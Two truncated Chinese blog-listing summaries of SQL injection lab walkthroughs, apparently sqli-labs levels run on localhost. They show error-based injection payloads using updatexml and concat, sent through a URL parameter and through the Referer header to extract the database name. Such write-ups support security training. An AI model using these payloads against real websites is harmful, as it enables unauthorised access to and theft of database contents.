摘要： 第二十三关 ......(其实发现好简单的一关) 就是过滤 #和-- http://127.0.0.1/sqli/Less-23/?id=1' and '1'='1 http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(s 阅读全文

摘要： 其实漏洞写得很明确了,Referer存在漏洞 Referer:1' and '1'='1--+ Referer:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1 #数据库 Referer:1' and upd 阅读全文